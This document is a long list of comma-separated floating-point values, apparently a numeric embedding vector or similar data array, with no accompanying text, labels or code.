-0.008683443069458008, -0.007490897551178932, 0.000638672208879143, -0.03464807942509651, -0.002124444115906954, -0.01932351663708687, 0.0194663368165493, 0.02620743028819561, -0.0054771387949585915, 0.01489610318094492, 0.01068291999399662, -0.009690321981906891, 0.02257980778813362, 0.012768087908625603, -0.015967251732945442, 0.0203232541680336, 0.015581637620925903, 0.005162935238331556, -0.0027599921450018883, 0.007269526831805706, -0.0012336059007793665, 0.001180941006168723, -0.002908167662099004, 0.02070886828005314, -0.014767564833164215, 0.0061055454425513744, -0.008726288564503193, 0.004841590765863657, -0.03744734451174736, 0.022722626104950905, 0.028421135619282722, 0.01725262962281704, -0.012475308030843735, -0.01798100955784321, 0.003042061347514391, 0.03087763674557209, 0.014796129427850246, 0.022694062441587448, -0.005034397356212139, -0.010954277589917183, 0.028378291055560112, 0.01919497922062874, -0.02200852893292904, 0.03224870562553406, -0.008640596643090248, 0.01569589413702488, -0.012953754514455795, -0.026964373886585236, 0.007955062203109264, 0.005694938823580742, 0.013917787931859493, -0.012318206019699574, 0.024150824174284935, -0.0007194546633400023, 0.013282239437103271, 0.04061794653534889, 0.02685011923313141, -0.0250791534781456, -0.024379337206482887, -0.0030170679092407227, -0.018609417602419853, -0.003834711154922843, 0.009033351205289364, -0.0216229148209095, -0.025350511074066162, 0.002377949422225356, -0.005716361571103334, 0.04001810401678085, -0.004448836203664541, 0.0033634058199822903, -0.03998953849077225, -0.040103793144226074, 0.0009952753316611052, -0.027178604155778885, -0.036304786801338196, 0.018523724749684334, 0.01204684842377901, 0.008026471361517906, 0.0007181157125160098, -0.006976746488362551, -0.024065133184194565, -0.030563432723283768, 0.0371902696788311, -0.0067268116399645805, 0.025464767590165138, 0.013532173819839954, -0.01565304771065712, -0.015153178945183754, 0.03421961888670921, 0.014981795102357864, 0.01022589672356844, -0.009918834082782269, 0.010868585668504238, 0.006855349522083998, 0.025664715096354485, -0.030163537710905075, 0.01872367225587368, 0.008404944092035294, -0.022679781541228294, 0.003009926760569215, -0.0037954356521368027, 0.017352603375911713, 0.0037740126717835665, 0.015081768855452538, 0.005195069592446089, 0.009847423993051052, 0.009411823935806751, -0.0015495945699512959, 0.017352603375911713, 0.03273429349064827, -0.03104902058839798, -0.014938948675990105, 0.013939210213720798, 0.023879466578364372, -0.001278237090446055, -0.0104829715564847, 0.026021763682365417, -0.034619513899087906, 0.012203950434923172, -0.006691106595098972, 0.014624745585024357, 0.004213183652609587, -0.000590916839428246, -0.029992153868079185, -0.00026622498990036547, 0.02365095540881157, 0.0054664271883666515, -0.018995029851794243, -0.03127753362059593, -0.017581114545464516, 0.024493591859936714, 0.021979963406920433, -0.011939733289182186, 0.015852995216846466, 0.017966728657484055, 0.01803813874721527, 0.008740570396184921, 0.01799529232084751, 0.017109809443354607, -0.0003688767028506845, 0.01206113025546074, 0.02953512966632843, 0.0061055454425513744, 0.009483233094215393, -0.00009009919449454173, -0.021180173382163048, 0.007240962702780962, 0.008012189529836178, -0.04087502136826515, -0.0015915479743853211, -0.004527387209236622, 0.04221752658486366, 0.009076196700334549, -0.0389326736330986, -0.01453191228210926, -0.0018405899172648787, -0.008040753193199635, -0.014539053663611412, 0.0004295751277823001, 0.002749280771240592, 0.0042060427367687225, -0.008105022832751274, -0.008554904721677303, 0.005523554980754852, -0.012004002928733826, -0.03596201911568642, 0.010968559421598911, -0.023165367543697357, -0.012682396918535233, 0.005923450458794832, -0.0042703114449977875, -0.002488634781911969, 0.007305231876671314, 0.0021976393181830645, -0.002722501987591386, 0.015167460776865482, -0.006266217678785324, 0.012153963558375835, 0.001186296809464693, -0.021223019808530807, -0.013025163672864437, -0.007955062203109264, -0.004827308468520641, 0.005073672626167536, -0.021594351157546043, 0.007412346545606852, 0.021608632057905197, -0.013939210213720798, -0.004948705434799194, 0.005148652940988541, -0.04221752658486366, 0.02465069480240345, 0.007283808663487434, 0.019923359155654907, 0.005691368132829666, -0.0315631702542305, -0.031763117760419846, 0.0003150961420033127, -0.0045380983501672745, 0.02243698760867119, -0.006891054566949606, -0.003802576567977667, -0.020680304616689682, -0.007230251561850309, 0.03213445097208023, -0.00032558446400798857, 0.01502464059740305, -0.0011925451690331101, -0.013010881841182709, 0.010654355399310589, -0.008297828957438469, 0.00942610576748848, 0.033962544053792953, -0.005905597936362028, 0.0035937028005719185, 0.02729286067187786, 0.0014487281441688538, 0.018180958926677704, 0.019095005467534065, -0.005705650430172682, 0.005177217070013285, -0.0026850118301808834, -0.014067748561501503, 0.01003308966755867, -0.02832116186618805, -0.001862012897618115, 0.003249150002375245, 0.002954584313556552, 0.02495061606168747, -0.013517891988158226, 0.00046639583888463676, 0.01872367225587368, -0.003150961361825466, -0.017666807398200035, -0.010718624107539654, -0.018923621624708176, 0.004788033198565245, -0.009097619913518429, 0.013082291930913925, -0.005787771660834551, -0.0008694154093973339, 0.033962544053792953, 0.007605153135955334, -0.024664975702762604, 0.007769396062940359, -0.008447789587080479, -0.029506566002964973, 0.006330486852675676, -0.025750406086444855, -0.010297305881977081, -0.003145605558529496, 0.008976222947239876, 0.006983887404203415, -0.021337274461984634, 0.021865708753466606, 0.0026867971755564213, -0.02140868455171585, 0.005705650430172682, -0.0026171724312007427, -0.026307404041290283, 0.010890007950365543, 0.023379597812891006, 0.004877295345067978, 0.014039183966815472, -0.023879466578364372, 0.002838543150573969, -0.01531028002500534, -0.024379337206482887, -0.0145961819216609, 0.00351872225292027, -0.013525033369660378, -0.013046586886048317, -0.017752498388290405, -0.020608894526958466, 0.008097881451249123, -0.005573541857302189, -0.009526079520583153, -0.0008484387653879821, -0.008497776463627815, 0.01518174260854721, 0.043274395167827606, -0.011025686748325825, -0.032420091331005096, -0.02407941408455372, -0.011904028244316578, -0.004730905406177044, 0.0069945985451340675, -0.014360528439283371, -0.00275106611661613, -0.03384828940033913, 0.0036776093766093254, 0.02040894702076912, 0.02166576124727726, -0.01301802322268486, 0.005452144891023636, -0.0078122420236468315, 0.007697985973209143, 0.0038918389473110437, -0.01595296896994114, -0.0017745357472449541, -0.024964896962046623, 0.02239414118230343, -0.009347554296255112, 0.004788033198565245, 0.01618148200213909, 0.01453191228210926, 0.0007672100327908993, -0.000781045644544065, -0.001193437841720879, -0.025321947410702705, -0.01902359537780285, 0.012075412087142467, -0.0005860074306838214, -0.00563066964969039, -0.0013317944249138236, 0.015567355789244175, 0.011475569568574429, -0.01616719923913479, 0.013382213190197945, -0.015453100204467773, -0.009690321981906891, -0.005384305492043495, 0.011704080738127232, -0.02300826646387577, 0.014460503123700619, -0.018523724749684334, 0.00843350775539875, 0.004838020075112581, -0.0020476786885410547, 0.004109639208763838, 0.0009060129523277283, 0.002354741096496582, 0.01820952259004116, -0.0013799960725009441, 0.0015040708240121603, 0.0008944088476710021, 0.02979220636188984, -0.01518174260854721, -0.0263788141310215, 0.00830497033894062, 0.008569186553359032, -0.028835313394665718, -0.004288163967430592, 0.009604630060493946, -0.007030303589999676, 0.025721842423081398, 0.0001935877517098561, -0.0068839131854474545, -0.021937118843197823, 0.04533099755644798, -0.005619958508759737, 0.039246875792741776, 0.005198639817535877, 0.02070886828005314, 0.02352241799235344, 0.018737955018877983, 0.015338844619691372, -0.019623437896370888, -0.018323777243494987, -0.007140988949686289, 0.0018441603751853108, 0.023922313004732132, 0.010854302905499935, 0.01812382973730564, 0.017938164994120598, 0.027607062831521034, 2.196690900291287e-7, -0.01643855683505535, 0.01286806259304285, 0.0076908450573682785, 0.023679519072175026, -0.013939210213720798, -0.012353911064565182, -0.007155270781368017, -0.025450484827160835, -0.008026471361517906, -0.042617421597242355, 0.01812382973730564, -0.015367408283054829, 0.0012273575412109494, -0.016667068004608154, 0.009640335105359554, -0.04170337691903114, -0.026921529322862625, 0.004777321591973305, 0.0008537945104762912, -0.012618127278983593, -0.002838543150573969, 0.003745448775589466, -0.003823999548330903, 0.01763824373483658, 0.008212137036025524, 0.00927614513784647, -0.01176120899617672, 0.026264557614922523, 0.011668375693261623, -0.0419604517519474, 0.006230513099581003, -0.021994246169924736, 0.01885221153497696, 0.0021012360230088234, -0.02360810898244381, -0.01381781417876482, -0.012632409110665321, -0.011954016052186489, -0.013996338471770287, -0.03356264904141426, -0.025022026151418686, -0.01855229027569294, -0.025707559660077095, 0.011368454433977604, 0.023679519072175026, 0.00611982773989439, 0.00549142062664032, -0.006905336398631334, -0.007519461214542389, -0.01773821748793125, -0.0009354695794172585, -0.001265740254893899, -0.012453884817659855, 0.006094834301620722, 0.014060607179999352, 0.03430531173944473, 0.017266910523176193, 0.01803813874721527, 0.012889484874904156, -0.016381429508328438, 0.008969082497060299, -0.006987457629293203, -0.011082815006375313, 0.022765472531318665, 0.019794821739196777, 0.02365095540881157, -0.007540884427726269, 0.003709743730723858, -0.007583730388432741, -0.009076196700334549, -0.024936333298683167, -0.0029902891255915165, -0.005912738852202892, -0.01018305029720068, -0.005552119109779596, -0.0053450302220880985, -0.0028046234510838985, -0.022594088688492775, 0.017938164994120598, 0.007790818810462952, 0.010732906870543957, -0.0018164890352636576, -0.014503348618745804, 0.005552119109779596, -0.003525863401591778, -0.014167722314596176, 0.006416178774088621, 0.010997123084962368, 0.014231991022825241, -0.006191237363964319, 0.028378291055560112, 0.005794912576675415, -0.017538268119096756, -0.014617604203522205, -0.023836622014641762, 0.014810411259531975, 0.03499084711074829, -0.006187667138874531, -0.011147083714604378, -0.004370285198092461, -0.02158006839454174, 0.00010622221452649683, -0.010325870476663113, 0.007390923798084259, 0.00727666774764657, 0.004905859474092722, -0.015610202215611935, 0.028835313394665718, 0.02036610059440136, -0.01678132452070713, 0.011704080738127232, -0.016667068004608154, -0.003852563677355647, 0.0006301922840066254, 0.01618148200213909, -0.03247721865773201, -0.023408161476254463, 0.02343672513961792, 0.0020869539584964514, -0.011311326175928116, 0.02085168845951557, -0.024365054443478584, -0.016381429508328438, -0.00001652748505875934, 0.0024011575151234865, -0.005084384232759476, -0.008419225923717022, -0.009847423993051052, 0.02187998965382576, -0.0009435031679458916, 0.018238086253404617, 0.022279886528849602, 0.0001762931642588228, 0.011454146355390549, 0.0003675377811305225, -0.0019173555774614215, 0.007797960191965103, 0.005562830250710249, 0.0023101100232452154, -0.008254983462393284, -0.001290733809582889, 0.004434554371982813, 0.004438124597072601, 0.003995383158326149, -0.0019959064666181803, -0.012018284760415554, 0.012018284760415554, -0.002952798968181014, -0.0036811798345297575, 0.02612173743546009, 0.002752851229161024, 0.0015567356022074819, -0.0008247842197306454, 0.017623960971832275, 0.007590871304273605, 0.02123730070888996, -0.018409470096230507, 0.027092913165688515, 0.009925974532961845, 0.008462072350084782, 0.005184357985854149, 0.014981795102357864, -0.002474352717399597, 0.005955584812909365, -0.01396777480840683, -0.0015335273928940296, -0.022894009947776794, -0.013217970728874207, 0.021722888574004173, -0.013132278807461262, -0.018538007512688637, -0.012075412087142467, -0.0004311372176744044, -0.0029885040130466223, 0.011646953411400318, -0.00469162967056036, 0.003242009086534381, -0.01377496775239706, -0.01379639096558094, 0.00955464318394661, -0.009154748171567917, -0.020951662212610245, -0.015153178945183754, 0.01266811415553093, 0.013075150549411774, -0.031191840767860413, -0.0012193238362669945, -0.0069017657078802586, -0.013860659673810005, 0.007348077837377787, -0.006562568712979555, -0.0083263935521245, -0.007462333422154188, -0.010047371499240398, 0.010475831106305122, 0.005766348447650671, -0.0008975330274552107, -0.003952537197619677, -0.013567878864705563, 0.035305049270391464, 0.005412869621068239, -0.0033062780275940895, -0.02200852893292904, 0.008105022832751274, -0.010740047320723534, -0.008726288564503193, 0.010218755342066288, 0.0011532697826623917, -0.020508920773863792, 0.01390350516885519, 0.018323777243494987, -0.004959417041391134, -0.028721056878566742, -0.003449097741395235, 0.011211352422833443, -0.018780801445245743, -0.017352603375911713, 0.0015424536541104317, -0.005616387818008661, 0.020523201674222946, -0.03827570006251335, 0.0058663226664066315, -0.002186927944421768, 0.007455192506313324, 0.018795082345604897, -0.00452024582773447, 0.018923621624708176, -0.027050066739320755, 0.016795605421066284, -0.009219016879796982, -0.007376641500741243, 0.004448836203664541, -0.012568140402436256, 0.0117826322093606, -0.019037876278162003, -0.017095528542995453, -0.009226158261299133, -0.0004297982668504119, -0.005512843374162912, 0.013682135380804539, 0.003916832618415356, -0.017538268119096756, 0.006023424211889505, 0.018223803490400314, 0.02305111289024353, -0.00011883051774930209, -0.004227465484291315, 0.008690583519637585, -0.018452316522598267, 0.0270215030759573, -0.006826785393059254, -0.005380735266953707, 0.006676824763417244, 0.032420091331005096, 0.010004526004195213, 0.0017352603608742356, -0.002629669150337577, 0.0209802258759737, 0.0196805652230978, -0.03053486905992031, 0.020523201674222946, 0.029006697237491608, -0.004038229119032621, -0.02499346062541008, -0.0047023412771523, -0.0036544010508805513, -0.016495684161782265, -0.017895318567752838, -0.006426889915019274, -0.007348077837377787, -0.017281193286180496, -0.020523201674222946, -0.02369380183517933, -0.011846900917589664, -0.015924405306577682, 0.01115422509610653, -0.01442479807883501, -0.009925974532961845, -0.024193670600652695, 0.019823385402560234, -0.020723149180412292, 0.009797437116503716, -0.011139943264424801, 0.023579545319080353, -0.0071159955114126205, 0.013132278807461262, -0.003243794199079275, -0.01126848068088293, -0.041017841547727585, -0.004880866035819054, 0.004420272074639797, 0.009654616937041283, 0.00923329871147871, 0.01079003419727087, -0.008640596643090248, -0.0004362697945907712, -0.013874941505491734, -0.003984672017395496, -0.007540884427726269, -0.0067910803481936455, -0.00728737935423851, 0.023036830127239227, -0.004252458922564983, 0.02495061606168747, -0.00430244579911232, 0.003540145233273506, 0.00003659756839624606, 0.005323607474565506, 0.019709128886461258, 0.017309756949543953, 0.009111901745200157, 0.019366363063454628, 0.013974915258586407, -0.022865446284413338, 0.022822601720690727, -0.01795244589447975, -0.02503630705177784, -0.0061626737006008625, 0.001081859809346497, -0.02426508069038391, -0.02028040960431099, -0.008761993609368801, 0.0008484387653879821, 0.02296542003750801, 0.0188093651086092, -0.0024975608102977276, 0.013360789977014065, -0.000022204012566362508, -0.006491159088909626, 0.002560044638812542, -0.01919497922062874, -0.005380735266953707, -0.020651740953326225, 0.028549674898386, 0.01639571040868759, -0.0033812583424150944, -0.010818598791956902, -0.005384305492043495, -0.005337889306247234, 0.006744664162397385, 0.002158363815397024, -0.006037706043571234, 0.026364531368017197, 0.010561523027718067, -0.010261600837111473, -0.010854302905499935, -0.0019048588583245873, 0.004698770586401224, 0.0025064870715141296, -0.004091786686331034, -0.005523554980754852, 0.005237915553152561, -0.020223280414938927, 0.026307404041290283, 0.008190714754164219, 0.012182527221739292, 0.008183573372662067, -0.025307664647698402, -0.003354479558765888, 0.020523201674222946, -0.04961559176445007, -0.008447789587080479, -0.008490636013448238, -0.002663588849827647, -0.004695200361311436, 0.03684750199317932, -0.016052942723035812, -0.003416963154450059, -0.005902027245610952, 0.022951139137148857, -0.028335444629192352, -0.0007676563109271228, -0.00234581483528018, -0.007833665236830711, 0.007990766316652298, -0.016452839598059654, 0.005980578251183033, 0.013632147572934628, 0.0032705729827284813, -0.012325347401201725, -0.008254983462393284, 0.02399372309446335, -0.015495945699512959, -0.006155532319098711, 0.003466950263828039, -0.0031188270077109337, -0.009247580543160439, -0.0017450791783630848, 0.007940779440104961, -0.005037967581301928, 0.015210306271910667, 0.021094482392072678, -0.009618911892175674, 0.018452316522598267, -0.029649386182427406, -0.01518174260854721, 0.004338150843977928, 0.0008122875005938113, 0.019009312614798546, -0.009518938139081001, -0.015595920383930206, 0.006519722752273083, -0.019609155133366585, -0.0051415120251476765, -0.006576851010322571, -0.027607062831521034, -0.018909338861703873, -0.030249228700995445, 0.00429173419252038, -0.00031219510128721595, 0.021908555179834366, 0.03364834189414978, -0.0036186962388455868, 0.0049558463506400585, 0.004634501878172159, 0.019095005467534065, -0.01759539730846882, 0.011982579715549946, 0.002922449726611376, 0.022079937160015106, -0.03439100459218025, -0.009583206847310066, -0.019666284322738647, -0.00037244721897877753, -0.013732122257351875, -0.014467643573880196, -0.009654616937041283, -0.013425059616565704, -0.022565525025129318, -0.009504656307399273, -0.006480447482317686, -0.023108240216970444, 0.016709914430975914, -0.004670206923037767, 0.0027153610717505217, 0.005359312053769827, 0.017452577129006386, 0.010475831106305122, 0.0008122875005938113, -0.011496991850435734, -0.003931114450097084, 0.00688748387619853, -0.021437248215079308, 0.009526079520583153, 0.010647214949131012, -0.0035972732584923506, 0.00548070902004838, 0.019666284322738647, 0.007905074395239353, -0.002970651490613818, -0.010540099814534187, -0.011347031220793724, 0.024979179725050926, -0.003225941676646471, 0.004855872597545385, 0.037990059703588486, -0.011796914041042328, -0.005798483267426491, -0.011768349446356297, -0.024536438286304474, 0.0037740126717835665, -0.019095005467534065, -0.002276190323755145, -0.008869108743965626, -0.016767041757702827, 0.002144081983715296, 0.02015187032520771, 0.009783155284821987, 0.0017432939494028687, -0.0025404067710042, -0.016767041757702827, -0.00814786832779646, 0.021908555179834366, 0.01346790511161089, -0.006137680262327194, -0.005273620598018169, 0.004498823080211878, -0.00603056512773037, -0.02906382456421852, -0.012718101032078266, 0.009219016879796982, -0.008362097665667534, -0.024679258465766907, -0.0030349204316735268, 0.003834711154922843, 0.007201687432825565, 0.028635365888476372, 0.018995029851794243, 0.005659233778715134, -0.013475046493113041, -0.013410777784883976, 0.01772393472492695, 0.025621868669986725, 0.012903766706585884, -0.0016950923018157482, 0.0050772433169186115, 0.02844969928264618, -0.001080074580386281, 0.005619958508759737, 0.0188093651086092, -0.006723240949213505, -0.019951922819018364, 0.014489066787064075, -0.002568970900028944, 0.03881841525435448, -0.009440387599170208, -0.010340152308344841, 0.033019933849573135, 0.003449097741395235, -0.009219016879796982, -0.007769396062940359, -0.026350248605012894, 0.0021797867957502604, 0.017009835690259933, 0.008761993609368801, -0.010582945309579372, 0.007455192506313324, -0.008354957215487957, -0.026921529322862625, -0.0023101100232452154, 0.0006484910845756531, 0.019580591470003128, -0.005284331738948822, 0.005473568104207516, -0.003527648514136672, 0.020466074347496033, 0.0172954760491848, -0.021951399743556976, -0.0017263340996578336, 0.005302184261381626, -0.008683443069458008, -0.022479834035038948, -0.008240701630711555, -0.0042060427367687225, 0.00494156451895833, -0.001965557225048542, -0.010697201825678349, 0.00012273574247956276, -0.007726550102233887, 0.0011496992083266377, 0.015438818372786045, -0.005255768075585365, 0.008026471361517906, 0.008340675383806229, 0.006437601521611214, -0.00814786832779646, 0.002258337801322341, 0.009219016879796982, 0.0017183005111292005, -0.00353478966280818, 0.0020869539584964514, 0.030991891399025917, -0.04393136501312256, -0.010454407893121243, -0.005612817592918873, 0.012189668603241444, 0.004248888231813908, 0.018195239827036858, -0.0029956449288874865, 0.001573695451952517, -0.015295998193323612, 0.0035722798202186823, -0.0058913161046803, -0.01037585735321045, -0.03264860063791275, 0.007940779440104961, 0.005680656526237726, -0.009940256364643574, 0.004816596861928701, -0.007155270781368017, -0.005062961019575596, 0.007133848033845425, 0.0013648215681314468, -0.006555427797138691, -0.004823738243430853, -0.0376187302172184, -0.015453100204467773, -0.007280238438397646, -0.013089433312416077, -0.021265864372253418, -0.008040753193199635, 0.004116780124604702, 0.002576111815869808, 0.023765211924910545, -0.01790960133075714, 0.010825739242136478, -0.009783155284821987, 0.016552813351154327, 0.0104829715564847, 0.004784462507814169, -0.004245318006724119, 0.0023761640768498182, -0.03601915016770363, -0.012268219143152237, -0.025221973657608032, -0.01081145741045475, 0.00040703636477701366, -0.012125398963689804, -0.017281193286180496, 0.0010309802601113915, -0.0153531264513731, -0.0005793127347715199, 0.008319252170622349, 0.01457475870847702, 0.018652264028787613, -0.01618148200213909, -0.008090741001069546, 0.011668375693261623, 0.0229225754737854, -0.010582945309579372, 0.0066446904093027115, -0.02070886828005314, 0.004641642794013023, -0.009904551319777966, 0.006812503561377525, 0.004277452360838652, -0.020308973267674446, -0.01100426446646452, 0.00959748961031437, -0.008412085473537445, -0.025707559660077095, -0.013425059616565704, -0.004827308468520641, 0.02776416577398777, 0.0024279362987726927, 0.00610911613330245, -0.000985456514172256, 0.011546979658305645, 0.018880775198340416, -0.00511294836178422, 0.002133370377123356, 0.007633717264980078, -0.0016236823284998536, 0.00549142062664032, 0.0030920482240617275, -0.03581920266151428, 0.018523724749684334, 0.013132278807461262, 0.005030826665461063, -0.024579284712672234, 0.01980910263955593, 0.016966989263892174, 0.009904551319777966, -0.009161888621747494, 0.013346508145332336, -0.011996861547231674, -0.015410254709422588, 0.006805362645536661, -0.002956369426101446, 0.022279886528849602, 0.016067225486040115, -0.005841329228132963, 0.006209089886397123, -0.011425582692027092, -0.017766781151294708, 0.009097619913518429, -0.0036186962388455868, 0.0419604517519474, -0.006723240949213505, -0.009747450239956379, -0.011361313052475452, -0.02763562835752964, 0.011068533174693584, 0.0034848025534301996, 0.021308710798621178, -0.018795082345604897, 0.00767656322568655, 0.018609417602419853, 0.010418702848255634, -0.0015308494912460446, -0.02422223426401615, 0.01763824373483658, -0.003636548761278391, -0.004716623108834028, 0.0029206646140664816, 0.006916048005223274, 0.010475831106305122, 0.017766781151294708, 0.0030670547857880592, 0.009640335105359554, -0.010418702848255634, 0.018966466188430786, 0.022808318957686424, -0.010597228072583675, -0.0016183266416192055, -0.005766348447650671, -0.001765609486028552, 0.0034812320955097675, -0.004502393770962954, -0.009440387599170208, 0.013567878864705563, -0.012832357548177242, 0.005973437335342169, -0.001862012897618115, -0.00571993226185441, 0.002518983790650964, 0.020294690504670143, 0.008419225923717022, 0.007876510731875896, -0.01552451029419899, 0.013846377842128277, 0.00815500970929861, -0.006005571689456701, -0.001679917681030929, 0.011232775636017323, -0.008969082497060299, -0.01829521358013153, 0.011511274613440037, -0.0050201150588691235, 0.000639564823359251, -0.014410516247153282, -0.006423319689929485, -0.013810672797262669, 0.00573064386844635, -0.01993764191865921, 0.020351817831397057, -0.010104499757289886, -0.016938425600528717, -0.014967513270676136, 0.020765995606780052, -0.010390139184892178, 0.015938688069581985, -0.027392834424972534, 0.012025425210595131, -0.01625289022922516, 0.00904049165546894, 0.025407638400793076, 0.01868082769215107, -0.0036704684607684612, 0.028506828472018242, -0.007669422309845686, -0.0059484438970685005, -0.0026028905995190144, 0.005287902429699898, -0.0009399326518177986, 0.012025425210595131, -0.014881821349263191, -0.01629573665559292, 0.007348077837377787, 0.00044162553967908025, -0.030991891399025917, 0.02058033086359501, 0.0005262016202323139, -0.03878985345363617, 0.015767304226756096, 0.01859513483941555, 0.009604630060493946, -0.004502393770962954, -0.0024939903523772955, 0.0003722240508068353, 0.0014398018829524517, 0.028292598202824593, -0.004048940725624561, 0.01173978578299284, 0.009940256364643574, 0.011661235243082047, 0.002815334824845195, -0.01643855683505535, -0.029120953753590584, -0.005487849935889244, 0.0012550287647172809, -0.010440126061439514, -0.000017866419511847198, -0.009019069373607635, -0.014924666844308376, 0.025179127231240273, 0.013003741391003132, 0.015224588103592396, 0.010140204802155495, -0.0026903676334768534, -0.011839759536087513, -0.030906200408935547, -0.0047416165471076965, -0.0015861921710893512, -0.016338583081960678, -0.0030759810470044613, -0.010590086691081524, -0.012082553468644619, -0.0018066702177748084, -0.018323777243494987, 0.006748234387487173, 0.0033955401740968227, 0.008383520878851414, -0.02257980778813362, -0.014317682944238186, -0.0035794207360595465, 0.009776013903319836, 0.013289380818605423, -0.01780962571501732, 0.008576327934861183, -0.01785247214138508, 0.020780278369784355, -0.0022815458942204714, 0.0056520928628742695, -0.011147083714604378, -0.007683704141527414, 0.007755114231258631, 0.003272358328104019, 0.004673777148127556, 0.016895579174160957, 0.01929495297372341, -0.009925974532961845, 0.002572541357949376, 0.0018182743806391954, -0.004666636232286692, -0.015510228462517262, 0.01708124577999115, -0.001371069927699864, 0.009747450239956379, 0.019137850031256676, -0.005380735266953707, 0.0066446904093027115, -0.010404421016573906, 0.0050808135420084, -0.0010970344301313162, -0.005216492339968681, -0.010804316028952599, -0.008055035956203938, -0.015410254709422588, -0.027749883010983467, -0.01876651868224144, 0.014110594056546688, 0.014581899158656597, -0.017881035804748535, -0.008969082497060299, 0.013682135380804539, 0.006009142380207777, 0.017623960971832275, -0.003425889415666461, 0.014110594056546688, 0.011332749389111996, 0.006287640891969204, 0.03364834189414978, -0.00797648448497057, -0.018066702410578728, 0.0005105807213112712, -0.020694585517048836, 0.014231991022825241, 0.015281716361641884, 0.0003414285311009735, 0.014710437506437302, 0.022151347249746323, 0.030077844858169556, 0.003029564628377557, 0.006655401550233364, -0.008533481508493423, -0.02729286067187786, -0.0030920482240617275, 0.009668898768723011, 0.0002626545028761029, -0.013996338471770287, -0.010440126061439514, -0.0014219494769349694, 0.005291472654789686, -0.007683704141527414, 0.006480447482317686, -0.01426769606769085, -0.03561925143003464, 0.002154793357476592, 0.018837928771972656, -0.0011184574104845524, -0.00860489159822464, -0.0018155964789912105, -0.0014299830654636025, -0.00003099077730439603, 0.01171836256980896, -0.0016111856093630195, 0.01098284125328064, 0.0009042277233675122, 0.015253152698278427, 0.007912215776741505, -0.012582422234117985, -0.0063376277685165405, -0.02119445614516735, -0.003447312396019697, -0.027864139527082443, -0.006284070201218128, 0.0008627207134850323, -0.016881298273801804, -0.007833665236830711, -0.0043809968046844006, 0.006558998487889767, 0.03339126333594322, 0.006398326251655817, 0.03593345731496811, 0.010775752365589142, 0.0025743264704942703, -0.0175097044557333, 0.011768349446356297, 0.007769396062940359, -0.01803813874721527, 0.0136178657412529, -0.03347695618867874, -0.0034598091151565313, -0.006434031296521425, 0.013217970728874207, -0.025107717141509056, 0.003147390903905034, 0.0016950923018157482, -0.006437601521611214, 0.019751975312829018, -0.013546456582844257, 0.0033919697161763906, -0.0032152303028851748, -0.004052511416375637, 0.008226419799029827, 0.008369239047169685, 0.005284331738948822, -0.001784354681149125, 0.008090741001069546, -0.003233082825317979, 0.012103976681828499, -0.03136322274804115, 0.018780801445245743, -0.022679781541228294, 0.021208737045526505, -0.000688212807290256, 0.02136583998799324, 0.037247397005558014, -0.007897933945059776, -0.011339890770614147, -0.017066963016986847, 0.022694062441587448, 0.007862228900194168, -0.005348600912839174, 0.005159364547580481, -0.007612294051796198, -0.0013344723265618086, 0.008354957215487957, 0.021008789539337158, 0.005287902429699898, -0.008826262317597866, 0.017652524635195732, 0.010111640207469463, -0.006580421235412359, -0.0031134712044149637, -0.009261862374842167, -0.032105885446071625, -0.012589563615620136, -0.0011193500831723213, 0.002527910051867366, -0.0059198797680437565, 0.008376380428671837, 0.008469212800264359, -0.012860921211540699, 0.008811980485916138, -0.002133370377123356, -0.017523987218737602, -0.016752760857343674, 0.007762255147099495, -0.004098927602171898, 0.009004787541925907, -0.02326534129679203, 0.021437248215079308, 0.015253152698278427, -0.0039025505539029837, 0.00895480066537857, 0.01678132452070713, -0.018737955018877983, 0.0034955141600221395, 0.029849333688616753, -0.00037378614069893956, 0.03947538882493973, 0.024979179725050926, -0.01643855683505535, -0.003031349740922451, -0.024579284712672234, 0.009983102791011333, 0.01033301092684269, 0.0031884515192359686, -0.010997123084962368, 0.01344648189842701, -0.008462072350084782, 0.0059198797680437565, 0.0026939380913972855, -0.0032616467215120792, 0.012639550492167473, 0.013025163672864437, -0.010568663477897644, -0.03153460845351219, -0.01910928636789322, 0.030477741733193398, 0.029220927506685257, 0.01314656063914299, -0.0009631409193389118, 0.00012061576853739098, 0.00353478966280818, 0.011189930140972137, 0.0007515890756621957, -0.007262385915964842, 0.012082553468644619, -0.013503610156476498, 0.012203950434923172, -0.0005239700549282134, -0.006773228291422129, -0.02140868455171585, 0.006380473729223013, 0.004516675602644682, 0.014681873843073845, 0.0020780276972800493, -0.002829616889357567, -0.00609840452671051, 0.00689819548279047, 0.01033301092684269, 0.013096573762595654, 0.0034848025534301996, -0.025221973657608032, 0.02230845019221306, -0.003431245218962431, -0.0059770080260932446, -0.0006520615424960852, -0.036219097673892975, -0.027449961751699448, 0.011404159478843212, 0.00453095743432641, 0.01616719923913479, 0.010047371499240398, 0.001974483486264944, 0.003142035100609064, -0.03122040443122387, -0.008204996585845947, 0.0019173555774614215, -0.005809194408357143, -0.02663588896393776, 0.001988765550777316, -0.016924144700169563, 0.006837496999651194, -0.01846659742295742, 0.002917093923315406, 0.0023011837620288134, 0.022122783586382866, 0.01139701809734106, -0.004284593276679516, -0.0003947627847082913, -0.0027885562740266323, -0.0019816244021058083, -0.005412869621068239, -0.021008789539337158, -0.02689296379685402, 0.009961679577827454, -0.0039096917025744915, -0.020694585517048836, 0.01631001941859722, -0.017181219533085823, -0.004223894793540239, -0.026350248605012894, -0.010175908915698528, -0.016852734610438347, -0.011032828129827976, -0.002838543150573969, 0.011061391793191433, 0.009918834082782269, 0.009983102791011333, 0.006555427797138691, 0.0029795777518302202, -0.01518174260854721, 0.009490374475717545, -0.004145344253629446, 0.0235652644187212, -0.0011122090509161353, -0.0065518575720489025, -0.0015370978508144617, -0.008347815833985806, 0.0007814919808879495, 0.014239132404327393, -0.015267434529960155, -0.001086322939954698, -0.022151347249746323, 0.004348862450569868, 0.009847423993051052, 0.01906643994152546, 0.014539053663611412, -0.005562830250710249, 0.011175647377967834, 0.008183573372662067, -0.0014415871119126678, -0.0007480186177417636, 0.021465813741087914, -0.002386875683441758, 0.008404944092035294, 0.005184357985854149, 0.0036668977700173855, -0.002165504964068532, 0.009754590690135956, 0.0018084554467350245, -0.013832096010446548, 0.02175145223736763, 0.0017066963482648134, -0.013846377842128277, 0.006680394988507032, -0.00891195423901081, -0.01413915865123272, 0.0034955141600221395, 0.0020298261661082506, 0.022322731092572212, 0.013060868717730045, 0.0005520877311937511, -0.01631001941859722, -0.0066054146736860275, -0.002949228510260582, -0.000492728257086128, 0.0018513014074414968, -0.025407638400793076, 0.012989458627998829, -0.027749883010983467, -0.025607585906982422, -0.012396756559610367, -0.011839759536087513, -0.014517630450427532, 